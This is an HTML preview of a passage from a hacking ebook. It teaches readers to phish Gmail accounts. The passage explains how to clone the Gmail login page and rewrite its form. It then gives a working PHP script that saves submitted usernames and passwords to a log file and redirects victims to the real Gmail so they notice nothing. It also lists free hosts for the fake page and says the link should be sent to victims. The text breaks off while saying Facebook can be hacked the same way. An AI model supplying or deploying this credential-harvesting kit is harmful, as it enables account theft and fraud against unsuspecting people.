Hack-X-Crypt by Ujjwal Sahay - HTML preview

What is phishing?

Phishing is an attempt by the sender to have the receiver of the email to release their personal information i.e. the attacker lures the victims to give some confidential information.

Why phishing?

There are many password cracking tools that are coming and going into/from the market. But phishing is the most efficient method to steal confidential information like, passwords, Credit card numbers, Bank account numbers etc.

How phishing works?

It works just like normal fishing. A fisherman generally throws bait into the water to lure the fish. Then a fish comes to take the food feeling that it is legitimate. When it bites the bait, it will be caught by the hook. Now the fisherman pulls out the fish.

In the same way, the hacker sends a fake login page to the victim. The victim thinks that it is a legitimate one and enters his confidential information. Now the data will be with the hacker.

Now, let s learn how to hack by phishing – I am selecting Gmail account to be hacked by phishing.

For phishing you need the following stuffs:-

• • First of all you have to open the gamil.com by your browser and when page open completely ,just give a right click on the page and a dialogue box will opens after you having an option ͞view page source in it
• • Click on the ͞view page source option and you see that the source code of that page will opens after you.
• • Then press ctrl+F to open the text/word finding box.
• • Type ͞actionA and replace it with anything.php Such as ͞actionAmail php
• • Then find for the ͞methodA and also replace it with ͞get Such as methodA get
• • Then save the file by anything.html Such as ͞Gmail html
• • Then create a blank notepad file ͞log txt
• • The again open the notepad and type the following codes:

<?php

header('Location: http://www.Gmail.com');

$handle = fopen('logs.txt', 'a');

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, '=');

fwrite($handle, $value);

fwrite($handle, '\r\n');

}

fwrite($handle, '\r\n');

fclose($handle);

exit;

?>

• • And save it as ͞mail php ;save this file by same name as you have replaced the ͞actionA
• • Now finally you have the three files which are required for the phishing.
• • 1) Gmail.html (fake login page)
• • 2) mail.php (to capture the login details)
• • 3) log.txt (to store the captured details)

Procedure:-

step1: create an account in any free web hosting site like

www.bythost.com

www.OOOwebhost.com

www.ripway.com

www.my3gb.com

step2: Now upload all the three files you have downloaded.(I have taken www.my3gb.com)

step 3: Give the link of the fake page to your victim. eg: www.yoursitename.my3gb.com/Gmail.html

step 4:when he clicks the link, it opens a fake Gmail page where he enters his login details. When he clicks sign in button, his login details will be stored in log.txt file.

Demonstration:-

Here i have uploaded my scripts on to www.my3gb.com

And copy the Gmail.html link which you have to send the victim. i clicked the Gmail.html link

A fake page was opened where i entered my login details.

This page will looks exactly similar to the original Gmail login page. And when the victim enters his/her login details for logging in into his/her account.

Now, this time the victim will redirected to the original Gmail login website.

The victim will even don t know that his her account got hacked Victim will think that the page gets reloaded due to internet errors or login mistakes etc.

Now his/her login details were captured by the php script and stored in log.txt file as shown in the figure below:-

In the same way you can hack FACEBOOK accounts and